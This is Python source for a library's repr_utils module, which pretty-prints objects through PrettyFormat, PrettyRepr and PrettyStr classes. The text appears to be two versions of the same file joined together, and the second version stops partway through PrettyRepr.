"""Pretty Formatter.
Designed for usage as __repr__ and __str__ replacement on complex objects
"""
__slots__ = ("__max_indent", "__indent_step")
def __init__(self, max_indent: int = 20, indent_step: int = 4) -> None:
"""Pretty Formatter.
:param max_indent: maximal indent before classic repr() call
:type max_indent: int
:param indent_step: step for the next indentation level
:type indent_step: int
"""
self.__max_indent: int = max_indent
self.__indent_step: int = indent_step
@property
def max_indent(self) -> int:
"""Max indent getter.
:return: maximal indent before switch to normal repr
:rtype: int
"""
return self.__max_indent
@property
def indent_step(self) -> int:
"""Indent step getter.
:return: indent step for nested definitions
:rtype: int
"""
return self.__indent_step
def next_indent(self, indent: int, multiplier: int = 1) -> int:
"""Next indentation value.
:param indent: current indentation value
:type indent: int
:param multiplier: step multiplier
:type multiplier: int
:return: next indentation value
:rtype: int
"""
return indent + multiplier * self.indent_step
def _repr_callable(
self,
src: types.FunctionType | types.MethodType,
indent: int = 0,
) -> str:
"""Repr callable object (function or method).
:param src: Callable to process
:type src: types.FunctionType | types.MethodType
:param indent: start indentation
:type indent: int
:return: Repr of function or method with signature.
:rtype: str
"""
param_repr: list[str] = []
next_indent = self.next_indent(indent)
prefix: str = "\n" + " " * next_indent
for param in _prepare_repr(src):
param_repr.append(f"{prefix}{param.name}")
annotation_exist = param.annotation is not param.empty # type: ignore[comparison-overlap]
if annotation_exist:
param_repr.append(f": {getattr(param.annotation, "__name__", param.annotation)!s}")
if param.value is not param.empty:
if annotation_exist:
param_repr.append(" = ")
else:
param_repr.append("=")
param_repr.append(self.process_element(src=param.value, indent=next_indent, no_indent_start=True))
param_repr.append(",")
if param_repr:
param_repr.append("\n")
param_repr.append(" " * indent)
param_str = "".join(param_repr)
sig: inspect.Signature = inspect.signature(src)
if sig.return_annotation is inspect.Parameter.empty:
annotation: str = ""
elif sig.return_annotation is type(None): # noqa: E721
# Python 3.10 special case
annotation = " -> None"
else:
annotation = f" -> {getattr(sig.return_annotation, "__name__", sig.return_annotation)!s}"
return (
f"{"":<{indent}}"
f"<{src.__class__.__name__} {src.__module__}.{src.__name__} with interface ({param_str}){annotation}>"
)
def _repr_attribute_holder(
self,
src: _AttributeHolderProto,
indent: int = 0,
no_indent_start: bool = False,
) -> str:
"""Repr attribute holder object (like argparse objects).
:param src: attribute holder object to process
:type src: _AttributeHolderProto
:param indent: start indentation
:type indent: int
:return: Repr of attribute holder object.
:rtype: str
"""
param_repr: list[str] = []
star_args: dict[str, typing.Any] = {}
next_indent = self.next_indent(indent)
prefix: str = "\n" + " " * next_indent
for arg in src._get_args(): # pylint: disable=protected-access
repr_val = self.process_element(arg, indent=next_indent)
param_repr.append(f"{prefix}{repr_val},")
for name, value in src._get_kwargs(): # pylint: disable=protected-access
if name.isidentifier():
repr_val = self.process_element(value, indent=next_indent, no_indent_start=True)
param_repr.append(f"{prefix}{name}={repr_val},")
else:
star_args[name] = value
if star_args:
repr_val = self.process_element(star_args, indent=next_indent, no_indent_start=True)
param_repr.append(f"{prefix}**{repr_val},")
if param_repr:
param_repr.append("\n")
param_repr.append(" " * indent)
param_str = "".join(param_repr)
return f"{"":<{indent if not no_indent_start else 0}}{src.__module__}.{src.__class__.__name__}({param_str})"
def _repr_named_tuple(
self,
src: _NamedTupleProto,
indent: int = 0,
no_indent_start: bool = False,
) -> str:
"""Repr named tuple.
:param src: named tuple object to process
:type src: _NamedTupleProto
:param indent: start indentation
:type indent: int
:return: Repr of named tuple object.
:rtype: str
"""
param_repr: list[str] = []
# noinspection PyBroadException
try:
args_annotations: dict[str, typing.Any] = typing.get_type_hints(type(src))
except BaseException: # NOSONAR
args_annotations = {}
next_indent = self.next_indent(indent)
prefix: str = "\n" + " " * next_indent
for arg_name, value in src._asdict().items():
repr_val = self.process_element(value, indent=next_indent, no_indent_start=True)
param_repr.append(f"{prefix}{arg_name}={repr_val},")
if arg_name in args_annotations and not isinstance(
getattr(args_annotations, arg_name, None), typing.ForwardRef
):
annotation = getattr(args_annotations[arg_name], "__name__", args_annotations[arg_name])
param_repr.append(f"# type: {annotation!s}")
if param_repr:
param_repr.append("\n")
param_repr.append(" " * indent)
param_str = "".join(param_repr)
return f"{"":<{indent if not no_indent_start else 0}}{src.__module__}.{src.__class__.__name__}({param_str})"
def _repr_dataclass(
self,
src: _DataClassProto,
indent: int = 0,
no_indent_start: bool = False,
) -> str:
"""Repr dataclass.
:param src: dataclass object to process
:type src: _DataClassProto
:param indent: start indentation
:type indent: int
:return: Repr of dataclass.
:rtype: str
"""
param_repr: list[str] = []
next_indent = self.next_indent(indent)
prefix: str = "\n" + " " * next_indent
for arg_name, field in src.__dataclass_fields__.items():
if not field.repr:
continue
repr_val = self.process_element(getattr(src, arg_name), indent=next_indent, no_indent_start=True)
comment: list[str] = []
if field.type:
if isinstance(field.type, str):
comment.append(f"type: {field.type}")
else:
comment.append(f"type: {field.type.__name__}")
if getattr(field, "kw_only", False): # python 3.10+
comment.append("kw_only")
if comment:
comment_str = " # " + " # ".join(comment)
else:
comment_str = ""
param_repr.append(f"{prefix}{arg_name}={repr_val},{comment_str}")
if param_repr:
param_repr.append("\n")
param_repr.append(" " * indent)
param_str = "".join(param_repr)
return f"{"":<{indent if not no_indent_start else 0}}{src.__module__}.{src.__class__.__name__}({param_str})"
@abc.abstractmethod
def _repr_simple(
self,
src: typing.Any,
indent: int = 0,
no_indent_start: bool = False,
) -> str:
"""Repr object without iteration.
:param src: Source object
:type src: typing.Any
:param indent: start indentation
:type indent: int
:param no_indent_start: ignore indent
:type no_indent_start: bool
:return: simple repr() over object
:rtype: str
"""
@abc.abstractmethod
def _repr_dict_items(
self,
src: dict[typing.Any, typing.Any],
indent: int = 0,
) -> str:
"""Repr dict items.
:param src: object to process
:type src: dict[typing.Any, typing.Any]
:param indent: start indentation
:type indent: int
:return: repr of key/value pairs from dict
:rtype: str
"""
@staticmethod
@abc.abstractmethod
def _repr_iterable_item(
obj_type: str,
prefix: str,
indent: int,
no_indent_start: bool,
result: str,
suffix: str,
) -> str:
"""Repr iterable item.
:param obj_type: Object type
:type obj_type: str
:param prefix: prefix
:type prefix: str
:param indent: start indentation
:type indent: int
:param no_indent_start: do not indent open bracket and simple parameters
:type no_indent_start: bool
:param result: result of pre-formatting
:type result: str
:param suffix: suffix
:type suffix: str
:return: formatted repr of "result" with prefix and suffix to explain type.
:rtype: str
"""
def _repr_iterable_items(
self,
src: Iterable[typing.Any],
indent: int = 0,
) -> str:
"""Repr iterable items (not designed for dicts).
:param src: object to process
:type src: Iterable[typing.Any]
:param indent: start indentation
:type indent: int
:return: repr of elements in iterable item
:rtype: str
"""
next_indent: int = self.next_indent(indent)
buf: list[str] = []
for elem in src:
buf.append("\n")
buf.append(self.process_element(src=elem, indent=next_indent))
buf.append(",")
return "".join(buf)
@property
@abc.abstractmethod
def _magic_method_name(self) -> str:
"""Magic method name.
:return: magic method name to lookup in processing objects
:rtype: str
"""
def process_element(
self,
src: typing.Any,
indent: int = 0,
no_indent_start: bool = False,
) -> str:
"""Make human readable representation of object.
:param src: object to process
:type src: typing.Any
:param indent: start indentation
:type indent: int
:param no_indent_start: do not indent open bracket and simple parameters
:type no_indent_start: bool
:return: formatted string
:rtype: str
"""
if hasattr(src, self._magic_method_name):
result = getattr(src, self._magic_method_name)(self, indent=indent, no_indent_start=no_indent_start)
return result # type: ignore[no-any-return]
if _known_callable(src):
return self._repr_callable(src=src, indent=indent)
if isinstance(src, _AttributeHolderProto):
return self._repr_attribute_holder(src=src, indent=indent, no_indent_start=no_indent_start)
if isinstance(src, tuple) and isinstance(src, _NamedTupleProto):
return self._repr_named_tuple(src=src, indent=indent, no_indent_start=no_indent_start)
if isinstance(src, _DataClassProto) and not isinstance(src, type) and src.__dataclass_params__.repr:
return self._repr_dataclass(src=src, indent=indent, no_indent_start=no_indent_start)
if _simple(src) or indent >= self.max_indent or not src:
return self._repr_simple(src=src, indent=indent, no_indent_start=no_indent_start)
if isinstance(src, dict):
prefix, suffix = "{", "}"
result = self._repr_dict_items(src=src, indent=indent)
elif isinstance(src, collections.deque):
result = self._repr_iterable_items(src=src, indent=self.next_indent(indent))
prefix, suffix = "(", ")"
else:
if isinstance(src, list):
prefix, suffix = "[", "]"
elif isinstance(src, tuple):
prefix, suffix = "(", ")"
elif isinstance(src, (set, frozenset)):
prefix, suffix = "{", "}"
else:
prefix, suffix = "", ""
result = self._repr_iterable_items(src=src, indent=indent)
if isinstance(src, collections.deque):
next_indent = self.next_indent(indent)
return (
f"{"":<{indent if not no_indent_start else 0}}"
f"{src.__class__.__name__}(\n"
f"{"":<{next_indent}}{prefix}{result}\n"
f"{"":<{next_indent}}{suffix},\n"
f"{"":<{self.next_indent(indent)}}maxlen={src.maxlen},\n"
f"{"":<{indent}})"
)
if type(src) in (list, tuple, set, dict):
return f"{"":<{indent if not no_indent_start else 0}}{prefix}{result}\n{"":<{indent}}{suffix}"
return self._repr_iterable_item(
obj_type=src.__class__.__name__,
prefix=prefix,
indent=indent,
no_indent_start=no_indent_start,
result=result,
suffix=suffix,
)
def __call__(
self,
src: typing.Any,
indent: int = 0,
no_indent_start: bool = False,
) -> str:
"""Make human-readable representation of object. The main entry point.
:param src: object to process
:type src: typing.Any
:param indent: start indentation
:type indent: int
:param no_indent_start: do not indent open bracket and simple parameters
:type no_indent_start: bool
:return: formatted string
:rtype: str
"""
result = self.process_element(src, indent=indent, no_indent_start=no_indent_start)
return result
class PrettyRepr(PrettyFormat):
"""Pretty repr.
Designed for usage as __repr__ replacement on complex objects
"""
__slots__ = ()
@property
def _magic_method_name(self) -> str:
"""Magic method name.
:return: magic method name to lookup in processing objects
:rtype: str
"""
return "__pretty_repr__"
def _repr_simple(
self,
src: typing.Any,
indent: int = 0,
no_indent_start: bool = False,
) -> str:
"""Repr object without iteration.
:param src: Source object
:type src: typing.Any
:param indent: start indentation
:type indent: int
:param no_indent_start: ignore indent
:type no_indent_start: bool
:return: simple repr() over object, except strings (add prefix) and set (uniform py2/py3)
:rtype: str
"""
return f"{"":<{0 if no_indent_start else indent}}{src!r}"
def _repr_dict_items(
self,
src: dict[typing.Any, typing.Any],
indent: int = 0,
) -> str:
"""Repr dict items.
:param src: object to process
:type src: dict[typing.Any, typing.Any]
:param indent: start indentation
:type indent: int
:return: repr of key/value pairs from dict
:rtype: str
"""
max_len: int = max(len(repr(key)) for key in src) if src else 0
next_indent: int = self.next_indent(indent)
prefix: str = "\n" + " " * next_indent
buf: list[str] = []
for key, val in src.items():
buf.append(prefix)
buf.append(f"{key!r:{max_len}}: ")
buf.append(self.process_element(val, indent=next_indent, no_indent_start=True))
buf.append(",")
return "".join(buf)
@staticmethod
def _repr_iterable_item(
obj_type: str,
prefix: str,
indent: int,
no_indent_start: bool,
result: str,
suffix: str,
) -> str:
"""Repr iterable item.
:param obj_type: Object type
:type obj_type: str
:param prefix: prefix
:type prefix: str
:param indent: start indentation
:type indent: int
:param no_indent_start: do not indent open bracket and simple parameters
:type no_indent_start: bool
:param result: result of pre-formatting
:type result: str
:param suffix: suffix
:type suffix: str
:return: formatted repr of "result" with prefix and suffix to explain type.
:rtype: str
"""
return f"{"":<{indent if not no_indent_start else 0}}{obj_type}({prefix}{result}\n{"":<{indent}}{suffix})"
class PrettyStr(PrettyFormat):
"""Pretty str.
Designed for usage as __str__ replacement on complex objects
"""
__slots__ = ()
@property
def _magic_method_name(self) -> str:
"""Magic method name.
:rtype: str
"""
return "__pretty_str__"
@staticmethod
def _strings_str(
indent: int,
val: bytes | str,
) -> str:
"""Custom str for strings and binary strings.
:param indent: result indent
:type indent: int
:param val: value for repr
:type val: bytes | str
:return: indented string as `str`
:rtype: str
"""
if isinstance(val, bytes):
string: str = val.decode(encoding="utf-8", errors="backslashreplace")
else:
string = val
return f"{"":<{indent}}{string}"
def _repr_simple(
self,
src: typing.Any,
indent: int = 0,
no_indent_start: bool = False,
) -> str:
"""Repr object without iteration.
:param src: Source object
:type src: typing.Any
:param indent: start indentation
:type indent: int
:param no_indent_start: ignore indent
:type no_indent_start: bool
:return: simple repr() over object, except strings (decode) and set (uniform py2/py3)
:rtype: str
"""
indent = 0 if no_indent_start else indent
if isinstance(src, (bytes, str)):
return self._strings_str(indent=indent, val=src)
return f"{"":<{indent}}{src!s}"
def _repr_dict_items(
self,
src: dict[typing.Any, typing.Any],
indent: int = 0,
) -> str:
"""Repr dict items.
:param src: object to process
:type src: dict[typing.Any, typing.Any]
:param indent: start indentation
:type indent: int
:return: repr of key/value pairs from dict
:rtype: str
"""
max_len = max(len(str(key)) for key in src) if src else 0
next_indent: int = self.next_indent(indent)
prefix: str = "\n" + " " * next_indent
buf: list[str] = []
for key, val in src.items():
buf.append(prefix)
buf.append(f"{key!s:{max_len}}: ")
buf.append(self.process_element(val, indent=next_indent, no_indent_start=True))
buf.append(",")
return "".join(buf)
@staticmethod
def _repr_iterable_item(
obj_type: str,
prefix: str,
indent: int,
no_indent_start: bool,
result: str,
suffix: str,
) -> str:
"""Repr iterable item.
:param obj_type: Object type
:type obj_type: str
:param prefix: prefix
:type prefix: str
:param indent: start indentation
:type indent: int
:param no_indent_start: do not indent open bracket and simple parameters
:type no_indent_start: bool
:param result: result of pre-formatting
:type result: str
:param suffix: suffix
:type suffix: str
:return: formatted repr of "result" with prefix and suffix to explain type.
:rtype: str
"""
return f"{"":<{indent if not no_indent_start else 0}}{prefix}{result}\n{"":<{indent}}{suffix}"
def pretty_repr(
src: typing.Any,
indent: int = 0,
no_indent_start: bool = False,
max_indent: int = 20,
indent_step: int = 4,
) -> str:
"""Make human readable repr of object.
:param src: object to process
:type src: typing.Any
:param indent: start indentation, all next levels is +indent_step
:type indent: int
:param no_indent_start: do not indent open bracket and simple parameters
:type no_indent_start: bool
:param max_indent: maximal indent before classic repr() call
:type max_indent: int
:param indent_step: step for the next indentation level
:type indent_step: int
:return: formatted string
:rtype: str
"""
return PrettyRepr(max_indent=max_indent, indent_step=indent_step)(
src=src,
indent=indent,
no_indent_start=no_indent_start,
)
def pretty_str(
src: typing.Any,
indent: int = 0,
no_indent_start: bool = False,
max_indent: int = 20,
indent_step: int = 4,
) -> str:
"""Make human readable str of object.
:param src: object to process
:type src: typing.Any
:param indent: start indentation, all next levels is +indent_step
:type indent: int
:param no_indent_start: do not indent open bracket and simple parameters
:type no_indent_start: bool
:param max_indent: maximal indent before classic repr() call
:type max_indent: int
:param indent_step: step for the next indentation level
:type indent_step: int
:return: formatted string
"""
return PrettyStr(max_indent=max_indent, indent_step=indent_step)(
src=src,
indent=indent,
no_indent_start=no_indent_start,
)
| # Copyright 2016 - 2022 Alexey Stepanov aka penguinolog
# Copyright 2016 Mirantis, Inc.
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""repr_utils module.
This is no reason to import this submodule directly, all required methods is
available from the main module.
"""
from __future__ import annotations
# Standard Library
import abc
import collections
import inspect
import types
import typing
if typing.TYPE_CHECKING:
# Standard Library
import dataclasses
from collections.abc import Callable
from collections.abc import Iterable
__all__ = ("PrettyFormat", "PrettyRepr", "PrettyStr", "pretty_repr", "pretty_str")
_SIMPLE_MAGIC_ATTRIBUTES = ("__repr__", "__str__")
@typing.runtime_checkable
class _AttributeHolderProto(typing.Protocol):
__slots__ = ()
def _get_kwargs(self) -> list[tuple[str, typing.Any]]:
"""Protocol stub."""
def _get_args(self) -> list[str]:
"""Protocol stub."""
@typing.runtime_checkable
class _NamedTupleProto(typing.Protocol):
__slots__ = ()
def _asdict(self) -> dict[str, typing.Any]:
"""Protocol stub."""
def __getnewargs__(self) -> tuple[typing.Any, ...]:
"""Protocol stub."""
def _replace(self, /, **kwds: dict[str, typing.Any]) -> _NamedTupleProto:
"""Protocol stub."""
@classmethod
def _make(cls, iterable: Iterable[typing.Any]) -> _NamedTupleProto:
"""Protocol stub."""
@typing.runtime_checkable
class _DataClassProto(typing.Protocol):
__slots__ = ()
__dataclass_params__: dataclasses._DataclassParams # type: ignore[name-defined]
__dataclass_fields__: dict[str, dataclasses.Field[typing.Any]] = {}
def _known_callable(item: typing.Any) -> bool:
"""Check for possibility to parse callable.
:param item: item to check for repr() way
:type item: typing.Any
:return: item is callable and should be processed not using repr
:rtype: bool
"""
return isinstance(item, (types.FunctionType, types.MethodType))
def _simple(item: typing.Any) -> bool:
"""Check for nested iterations: True, if not.
:param item: item to check for repr() way
:type item: typing.Any
:return: use repr() iver item by default
:rtype: bool
"""
return not any(
(
isinstance(item, data_type)
and all(
getattr(type(item), attribute) is getattr(data_type, attribute)
for attribute in _SIMPLE_MAGIC_ATTRIBUTES
)
)
for data_type in (list, set, tuple, dict, frozenset, collections.deque)
)
class ReprParameter:
"""Parameter wrapper wor repr and str operations over signature."""
__slots__ = ("_value", "_parameter")
POSITIONAL_ONLY = inspect.Parameter.POSITIONAL_ONLY
POSITIONAL_OR_KEYWORD = inspect.Parameter.POSITIONAL_OR_KEYWORD
VAR_POSITIONAL = inspect.Parameter.VAR_POSITIONAL
KEYWORD_ONLY = inspect.Parameter.KEYWORD_ONLY
VAR_KEYWORD = inspect.Parameter.VAR_KEYWORD
empty = inspect.Parameter.empty
def __init__(self, parameter: inspect.Parameter, value: typing.Any = inspect.Parameter.empty) -> None:
"""Parameter-like object store for repr and str tasks.
:param parameter: parameter from signature
:type parameter: inspect.Parameter
:param value: default value override
:type value: typing.Any
"""
self._parameter: inspect.Parameter = parameter
self._value: typing.Any = value if value is not parameter.empty else parameter.default
@property
def parameter(self) -> inspect.Parameter:
"""Parameter object.
:return: original inspect.Parameter object
:rtype: inspect.Parameter
"""
return self._parameter
@property
def name(self) -> None | str:
"""Parameter name.
:return: parameter name. For `*args` and `**kwargs` add corresponding prefixes
:rtype: None | str
"""
if self.kind == inspect.Parameter.VAR_POSITIONAL:
return "*" + self.parameter.name
if self.kind == inspect.Parameter.VAR_KEYWORD:
return "**" + self.parameter.name
return self.parameter.name
@property
def value(self) -> typing.Any:
"""Parameter value to log.
:return: If function is bound to class -> value is class instance else default value.
:rtype: typing.Any
"""
return self._value
@property
def annotation(self) -> inspect.Parameter.empty | str: # type: ignore[valid-type]
"""Parameter annotation.
:return: parameter annotation from signature
:rtype: inspect.Parameter.empty | str
"""
return self.parameter.annotation # type: ignore[no-any-return]
@property
def kind(self) -> int:
"""Parameter kind.
:return: parameter kind from inspect.Parameter
:rtype: int
"""
# noinspection PyTypeChecker
return self.parameter.kind
def __hash__(self) -> typing.NoReturn: # pylint: disable=invalid-hash-returned
"""Block hashing.
:raises TypeError: Not hashable.
"""
msg = f"not hashable type: '{self.__class__.__name__}'"
raise TypeError(msg)
def __repr__(self) -> str:
"""Debug purposes.
:return: parameter repr for debug purposes
:rtype: str
"""
return f'<{self.__class__.__name__} "{self}">'
def _prepare_repr(func: types.FunctionType | types.MethodType) -> list[ReprParameter]:
"""Get arguments lists with defaults.
:param func: Callable object to process
:type func: types.FunctionType | types.MethodType
:return: repr of callable parameter from signature
:rtype: list[ReprParameter]
"""
ismethod: bool = isinstance(func, types.MethodType)
self_processed: bool = False
result: list[ReprParameter] = []
if not ismethod:
real_func: Callable[..., typing.Any] = func
else:
real_func = func.__func__ # type: ignore[union-attr]
for param in inspect.signature(real_func).parameters.values():
if not self_processed and ismethod and func.__self__ is not None: # type: ignore[union-attr]
result.append(ReprParameter(param, value=func.__self__)) # type: ignore[union-attr]
self_processed = True
else:
result.append(ReprParameter(param))
return result
class PrettyFormat(metaclass=abc.ABCMeta):
"""Pretty Formatter.
Designed for usage as __repr__ and __str__ replacement on complex objects
"""
__slots__ = ("__max_indent", "__indent_step")
def __init__(self, max_indent: int = 20, indent_step: int = 4) -> None:
"""Pretty Formatter.
:param max_indent: maximal indent before classic repr() call
:type max_indent: int
:param indent_step: step for the next indentation level
:type indent_step: int
"""
self.__max_indent: int = max_indent
self.__indent_step: int = indent_step
@property
def max_indent(self) -> int:
"""Max indent getter.
:return: maximal indent before switch to normal repr
:rtype: int
"""
return self.__max_indent
@property
def indent_step(self) -> int:
"""Indent step getter.
:return: indent step for nested definitions
:rtype: int
"""
return self.__indent_step
def next_indent(self, indent: int, multiplier: int = 1) -> int:
"""Next indentation value.
:param indent: current indentation value
:type indent: int
:param multiplier: step multiplier
:type multiplier: int
:return: next indentation value
:rtype: int
"""
return indent + multiplier * self.indent_step
def _repr_callable(
self,
src: types.FunctionType | types.MethodType,
indent: int = 0,
) -> str:
"""Repr callable object (function or method).
:param src: Callable to process
:type src: types.FunctionType | types.MethodType
:param indent: start indentation
:type indent: int
:return: Repr of function or method with signature.
:rtype: str
"""
param_repr: list[str] = []
next_indent = self.next_indent(indent)
prefix: str = "\n" + " " * next_indent
for param in _prepare_repr(src):
param_repr.append(f"{prefix}{param.name}")
annotation_exist = param.annotation is not param.empty # type: ignore[comparison-overlap]
if annotation_exist:
param_repr.append(f": {getattr(param.annotation, '__name__', param.annotation)!s}")
if param.value is not param.empty:
if annotation_exist:
param_repr.append(" = ")
else:
param_repr.append("=")
param_repr.append(self.process_element(src=param.value, indent=next_indent, no_indent_start=True))
param_repr.append(",")
if param_repr:
param_repr.append("\n")
param_repr.append(" " * indent)
param_str = "".join(param_repr)
sig: inspect.Signature = inspect.signature(src)
if sig.return_annotation is inspect.Parameter.empty:
annotation: str = ""
elif sig.return_annotation is type(None): # noqa: E721
# Python 3.10 special case
annotation = " -> None"
else:
annotation = f" -> {getattr(sig.return_annotation, '__name__', sig.return_annotation)!s}"
return (
f"{'':<{indent}}"
f"<{src.__class__.__name__} {src.__module__}.{src.__name__} with interface ({param_str}){annotation}>"
)
def _repr_attribute_holder(
self,
src: _AttributeHolderProto,
indent: int = 0,
no_indent_start: bool = False,
) -> str:
"""Repr attribute holder object (like argparse objects).
:param src: attribute holder object to process
:type src: _AttributeHolderProto
:param indent: start indentation
:type indent: int
:return: Repr of attribute holder object.
:rtype: str
"""
param_repr: list[str] = []
star_args: dict[str, typing.Any] = {}
next_indent = self.next_indent(indent)
prefix: str = "\n" + " " * next_indent
for arg in src._get_args(): # pylint: disable=protected-access
repr_val = self.process_element(arg, indent=next_indent)
param_repr.append(f"{prefix}{repr_val},")
for name, value in src._get_kwargs(): # pylint: disable=protected-access
if name.isidentifier():
repr_val = self.process_element(value, indent=next_indent, no_indent_start=True)
param_repr.append(f"{prefix}{name}={repr_val},")
else:
star_args[name] = value
if star_args:
repr_val = self.process_element(star_args, indent=next_indent, no_indent_start=True)
param_repr.append(f"{prefix}**{repr_val},")
if param_repr:
param_repr.append("\n")
param_repr.append(" " * indent)
param_str = "".join(param_repr)
return f"{'':<{indent if not no_indent_start else 0}}{src.__module__}.{src.__class__.__name__}({param_str})"
def _repr_named_tuple(
self,
src: _NamedTupleProto,
indent: int = 0,
no_indent_start: bool = False,
) -> str:
"""Repr named tuple.
:param src: named tuple object to process
:type src: _NamedTupleProto
:param indent: start indentation
:type indent: int
:return: Repr of named tuple object.
:rtype: str
"""
param_repr: list[str] = []
# noinspection PyBroadException
try:
args_annotations: dict[str, typing.Any] = typing.get_type_hints(type(src))
except BaseException: # NOSONAR
args_annotations = {}
next_indent = self.next_indent(indent)
prefix: str = "\n" + " " * next_indent
for arg_name, value in src._asdict().items():
repr_val = self.process_element(value, indent=next_indent, no_indent_start=True)
param_repr.append(f"{prefix}{arg_name}={repr_val},")
if arg_name in args_annotations and not isinstance(
getattr(args_annotations, arg_name, None), typing.ForwardRef
):
annotation = getattr(args_annotations[arg_name], "__name__", args_annotations[arg_name])
param_repr.append(f"# type: {annotation!s}")
if param_repr:
param_repr.append("\n")
param_repr.append(" " * indent)
param_str = "".join(param_repr)
return f"{'':<{indent if not no_indent_start else 0}}{src.__module__}.{src.__class__.__name__}({param_str})"
def _repr_dataclass(
self,
src: _DataClassProto,
indent: int = 0,
no_indent_start: bool = False,
) -> str:
"""Repr dataclass.
:param src: dataclass object to process
:type src: _DataClassProto
:param indent: start indentation
:type indent: int
:return: Repr of dataclass.
:rtype: str
"""
param_repr: list[str] = []
next_indent = self.next_indent(indent)
prefix: str = "\n" + " " * next_indent
for arg_name, field in src.__dataclass_fields__.items():
if not field.repr:
continue
repr_val = self.process_element(getattr(src, arg_name), indent=next_indent, no_indent_start=True)
comment: list[str] = []
if field.type:
if isinstance(field.type, str):
comment.append(f"type: {field.type}")
else:
comment.append(f"type: {field.type.__name__}")
if getattr(field, "kw_only", False): # python 3.10+
comment.append("kw_only")
if comment:
comment_str = " # " + " # ".join(comment)
else:
comment_str = ""
param_repr.append(f"{prefix}{arg_name}={repr_val},{comment_str}")
if param_repr:
param_repr.append("\n")
param_repr.append(" " * indent)
param_str = "".join(param_repr)
return f"{'':<{indent if not no_indent_start else 0}}{src.__module__}.{src.__class__.__name__}({param_str})"
@abc.abstractmethod
def _repr_simple(
self,
src: typing.Any,
indent: int = 0,
no_indent_start: bool = False,
) -> str:
"""Repr object without iteration.
:param src: Source object
:type src: typing.Any
:param indent: start indentation
:type indent: int
:param no_indent_start: ignore indent
:type no_indent_start: bool
:return: simple repr() over object
:rtype: str
"""
@abc.abstractmethod
def _repr_dict_items(
self,
src: dict[typing.Any, typing.Any],
indent: int = 0,
) -> str:
"""Repr dict items.
:param src: object to process
:type src: dict[typing.Any, typing.Any]
:param indent: start indentation
:type indent: int
:return: repr of key/value pairs from dict
:rtype: str
"""
@staticmethod
@abc.abstractmethod
def _repr_iterable_item(
obj_type: str,
prefix: str,
indent: int,
no_indent_start: bool,
result: str,
suffix: str,
) -> str:
"""Repr iterable item.
:param obj_type: Object type
:type obj_type: str
:param prefix: prefix
:type prefix: str
:param indent: start indentation
:type indent: int
:param no_indent_start: do not indent open bracket and simple parameters
:type no_indent_start: bool
:param result: result of pre-formatting
:type result: str
:param suffix: suffix
:type suffix: str
:return: formatted repr of "result" with prefix and suffix to explain type.
:rtype: str
"""
def _repr_iterable_items(
self,
src: Iterable[typing.Any],
indent: int = 0,
) -> str:
"""Repr iterable items (not designed for dicts).
:param src: object to process
:type src: Iterable[typing.Any]
:param indent: start indentation
:type indent: int
:return: repr of elements in iterable item
:rtype: str
"""
next_indent: int = self.next_indent(indent)
buf: list[str] = []
for elem in src:
buf.append("\n")
buf.append(self.process_element(src=elem, indent=next_indent))
buf.append(",")
return "".join(buf)
@property
@abc.abstractmethod
def _magic_method_name(self) -> str:
"""Magic method name.
:return: magic method name to lookup in processing objects
:rtype: str
"""
def process_element(
self,
src: typing.Any,
indent: int = 0,
no_indent_start: bool = False,
) -> str:
"""Make human readable representation of object.
:param src: object to process
:type src: typing.Any
:param indent: start indentation
:type indent: int
:param no_indent_start: do not indent open bracket and simple parameters
:type no_indent_start: bool
:return: formatted string
:rtype: str
"""
if hasattr(src, self._magic_method_name):
result = getattr(src, self._magic_method_name)(self, indent=indent, no_indent_start=no_indent_start)
return result # type: ignore[no-any-return]
if _known_callable(src):
return self._repr_callable(src=src, indent=indent)
if isinstance(src, _AttributeHolderProto):
return self._repr_attribute_holder(src=src, indent=indent, no_indent_start=no_indent_start)
if isinstance(src, tuple) and isinstance(src, _NamedTupleProto):
return self._repr_named_tuple(src=src, indent=indent, no_indent_start=no_indent_start)
if isinstance(src, _DataClassProto) and not isinstance(src, type) and src.__dataclass_params__.repr:
return self._repr_dataclass(src=src, indent=indent, no_indent_start=no_indent_start)
if _simple(src) or indent >= self.max_indent or not src:
return self._repr_simple(src=src, indent=indent, no_indent_start=no_indent_start)
if isinstance(src, dict):
prefix, suffix = "{", "}"
result = self._repr_dict_items(src=src, indent=indent)
elif isinstance(src, collections.deque):
result = self._repr_iterable_items(src=src, indent=self.next_indent(indent))
prefix, suffix = "(", ")"
else:
if isinstance(src, list):
prefix, suffix = "[", "]"
elif isinstance(src, tuple):
prefix, suffix = "(", ")"
elif isinstance(src, (set, frozenset)):
prefix, suffix = "{", "}"
else:
prefix, suffix = "", ""
result = self._repr_iterable_items(src=src, indent=indent)
if isinstance(src, collections.deque):
next_indent = self.next_indent(indent)
return (
f"{'':<{indent if not no_indent_start else 0}}"
f"{src.__class__.__name__}(\n"
f"{'':<{next_indent}}{prefix}{result}\n"
f"{'':<{next_indent}}{suffix},\n"
f"{'':<{self.next_indent(indent)}}maxlen={src.maxlen},\n"
f"{'':<{indent}})"
)
if type(src) in (list, tuple, set, dict):
return f"{'':<{indent if not no_indent_start else 0}}{prefix}{result}\n{'':<{indent}}{suffix}"
return self._repr_iterable_item(
obj_type=src.__class__.__name__,
prefix=prefix,
indent=indent,
no_indent_start=no_indent_start,
result=result,
suffix=suffix,
)
def __call__(
self,
src: typing.Any,
indent: int = 0,
no_indent_start: bool = False,
) -> str:
"""Make human-readable representation of object. The main entry point.
:param src: object to process
:type src: typing.Any
:param indent: start indentation
:type indent: int
:param no_indent_start: do not indent open bracket and simple parameters
:type no_indent_start: bool
:return: formatted string
:rtype: str
"""
result = self.process_element(src, indent=indent, no_indent_start=no_indent_start)
return result
class PrettyRepr(PrettyFormat):
"""Pretty repr.
Designed for usage as __repr__ replacement on complex objects
"""
__slots__ = ()
@property
def _magic_method_name(self) -> str:
"""Magic method name.
:return: magic method name to lookup in processing objects
:rtype: str
"""
return "__pretty_repr__"
def _repr_simple(
self,
src: typing.Any,
indent: int = 0,
no_indent_start: bool = False,
) -> str:
"""Repr object without iteration.
:param src: Source object
:type src: typing.Any
:param indent: start indentation
:type indent: int
:param no_indent_start: ignore indent
:type no_indent_start: bool
:return: simple repr() over object, except strings (add prefix) and set (uniform py2/py3)
:rtype: str
"""
